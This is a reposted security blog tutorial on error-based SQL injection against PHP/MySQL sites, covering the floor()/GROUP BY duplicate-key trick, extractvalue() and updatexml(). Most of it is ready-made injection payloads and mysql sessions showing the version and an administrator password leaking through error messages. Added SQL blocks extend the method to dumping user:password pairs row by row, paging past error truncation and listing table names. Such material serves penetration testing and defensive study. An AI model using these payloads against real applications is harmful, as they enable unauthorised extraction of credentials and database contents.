
Three error-based techniques for MySQL injection


Some old notes. When MySQL fails to execute a statement it raises an error message, and PHP+MySQL sites frequently print that database error straight onto the page. If the injected input is reflected in the error text, specific data can be extracted by deliberately constructing an error in one of the following three ways.

Test environment:

mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+

1. Error via floor()

The trick is floor(rand(0)*2) used as a GROUP BY key: rand(0) is seeded, so the sequence is deterministic (0,1,1,0,1,1,...), and GROUP BY evaluates the key once to look it up in its temporary table and again when it inserts a missing key. With at least three source rows the key ending in 1 is inserted twice, and the resulting "Duplicate entry" error echoes whatever was concatenated in front of the digit. Either of the following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)))

The first payload relies on information_schema.tables for its rows; the second supplies exactly three rows itself via the union, which is why it works even when no large table is readable.

Example. First a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is leaked in the error message. To retrieve other data, replace version() with the desired subquery.
For example, to retrieve the administrator's username and password:
Method 1:

mysql> select * from article where id = 1 and (select 1 from(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Note that the trailing 1 in 'admin8881' is the floor(rand(0)*2) digit, not part of the password; the password is admin888.
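The following script is an added example, not code from the original post. It rebuilds the test schema described at the top of the page with constructed sample rows (the second admin row and the password values other than admin888 are invented), then walks through the floor() technique beyond the single row shown above: why two source rows produce no error while three do, how to pull both columns at once with a separator, how to move through rows with the LIMIT offset, and how to page long values because the duplicate-entry message is truncated.

```sql
-- Added example (not from the original post). Rebuilds the page's test
-- schema with constructed rows so the floor()/GROUP BY error can be
-- reproduced and extended locally.
CREATE DATABASE IF NOT EXISTS test;
USE test;
DROP TABLE IF EXISTS admin, article;
CREATE TABLE admin (
  id   INT(10) UNSIGNED NOT NULL AUTO_INCREMENT PRIMARY KEY,
  user VARCHAR(50) NOT NULL,
  pass VARCHAR(50) NOT NULL
);
CREATE TABLE article (
  id      INT(10) UNSIGNED NOT NULL AUTO_INCREMENT PRIMARY KEY,
  title   VARCHAR(50) NOT NULL,
  content VARCHAR(50) NOT NULL
);
-- Constructed data: 'admin'/'admin888' matches the page, the second row is invented.
INSERT INTO admin (user, pass) VALUES ('admin', 'admin888'), ('editor', 'secret');
INSERT INTO article (title, content) VALUES ('test', 'do it');

-- Why the error needs three rows: floor(rand(0)*2) yields 0,1,1,0,1,1,...
-- Row 1 computes key ...0 (absent), inserts it as ...1 after re-evaluation.
-- Row 2 computes ...1 (present), just increments the count.
-- Row 3 computes ...0 (absent), inserts it as ...1 again -> ERROR 1062.
-- With only two rows there is no error; this simply returns a count of 2.
SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2) x
GROUP BY CONCAT((SELECT pass FROM admin LIMIT 1), FLOOR(RAND(0)*2));

-- Three rows (the page's union of three) make the error deterministic.
-- 0x3a is ':' so user and pass stay distinguishable in the message,
-- e.g. Duplicate entry 'admin:admin8881' for key 'group_key'.
SELECT * FROM article WHERE id = 1 AND (SELECT COUNT(*) FROM
  (SELECT 1 UNION SELECT NULL UNION SELECT !1) x
  GROUP BY CONCAT((SELECT CONCAT(user, 0x3a, pass) FROM admin LIMIT 0,1),
                  FLOOR(RAND(0)*2)));

-- Walk the table row by row by moving the LIMIT offset.
SELECT * FROM article WHERE id = 1 AND (SELECT COUNT(*) FROM
  (SELECT 1 UNION SELECT NULL UNION SELECT !1) x
  GROUP BY CONCAT((SELECT CONCAT(user, 0x3a, pass) FROM admin LIMIT 1,1),
                  FLOOR(RAND(0)*2)));

-- The value echoed by ER_DUP_ENTRY is truncated (64 characters in practice),
-- so dump a whole column set with GROUP_CONCAT and page it with SUBSTR();
-- the floor() digit is always the last character of what is shown.
SELECT * FROM article WHERE id = 1 AND (SELECT COUNT(*) FROM
  (SELECT 1 UNION SELECT NULL UNION SELECT !1) x
  GROUP BY CONCAT((SELECT SUBSTR(GROUP_CONCAT(user, 0x3a, pass), 1, 60) FROM admin),
                  FLOOR(RAND(0)*2)));
```

Run it in the mysql client against a throwaway instance; every statement after the first two-row query is expected to fail with ERROR 1062, and the leaked data is the quoted value minus its final digit.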

2. ExtractValue

extractvalue() parses its second argument as XPath before touching the XML, and an invalid XPath expression raises an error that echoes the offending string. Prefixing the data with a character that is illegal in XPath (0x5c is a backslash) guarantees the error even when the leaked value itself would parse as a valid XPath name. Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)))

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

updatexml() takes the same XPath argument in second position and fails the same way; the 0x5e24 ('^$') markers on both sides just make the leaked value easy to pick out of the page. Test statement:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
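The following statements are an added example, not code from the original post, covering the two XPath functions together. They assume the page's test database (the admin and article tables described at the top, with a pass value of admin888); the 'editor' row referenced in the comments is an invented extra row. The example shows the check a practitioner wants before relying on these functions: what happens when the prefix character is omitted, and how to page around the 32-character cap on the string echoed in the XPATH syntax error.

```sql
-- Added example (not from the original post). Assumes the page's test
-- schema: admin(id, user, pass) with pass = 'admin888'.
-- extractvalue() and updatexml() exist since MySQL 5.1.5.

-- Without a prefix, a bare value such as 'admin888' is a valid XPath name
-- test, so there is no error and nothing is leaked: this returns the
-- article row with an empty extractvalue() result.
SELECT * FROM article WHERE id = 1
  AND EXTRACTVALUE(1, (SELECT pass FROM admin LIMIT 1));

-- 0x7e ('~') is the usual prefix; 0x5c ('\') and 0x5e24 ('^$') from the
-- page behave the same. The parser fails at the first character and echoes
-- the string from that point: XPATH syntax error: '~admin:admin888~'
SELECT * FROM article WHERE id = 1
  AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT CONCAT(user, 0x3a, pass) FROM admin LIMIT 1), 0x7e));

-- The echoed string is capped at 32 characters. After the one-character
-- prefix, 31 characters of data are visible per error, so a long value
-- (here a GROUP_CONCAT of every row) is read in 31-character windows.
SELECT * FROM article WHERE id = 1
  AND UPDATEXML(1, CONCAT(0x7e, SUBSTR((SELECT GROUP_CONCAT(user, 0x3a, pass) FROM admin), 1, 31)), 1);
SELECT * FROM article WHERE id = 1
  AND UPDATEXML(1, CONCAT(0x7e, SUBSTR((SELECT GROUP_CONCAT(user, 0x3a, pass) FROM admin), 32, 31)), 1);

-- The same shape enumerates the schema: table names of the current database.
SELECT * FROM article WHERE id = 1
  AND EXTRACTVALUE(1, CONCAT(0x7e, SUBSTR((SELECT GROUP_CONCAT(table_name)
        FROM information_schema.tables WHERE table_schema = DATABASE()), 1, 31)));
```

Because the error text is what carries the data, these only work when the application echoes the MySQL error (for example mysql_error() printed on the page); on a site that suppresses errors the same queries fail silently and a blind technique is needed instead.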

All, thanks foreign guys.

link:http://blog.ourren.com/2012/11/03/pentest_method_of_mysql_error.html

This article was collected and compiled by the Information Security Group of the Network Security Attack and Defense Research Lab (www.91ri.org); please credit the source when reproducing.
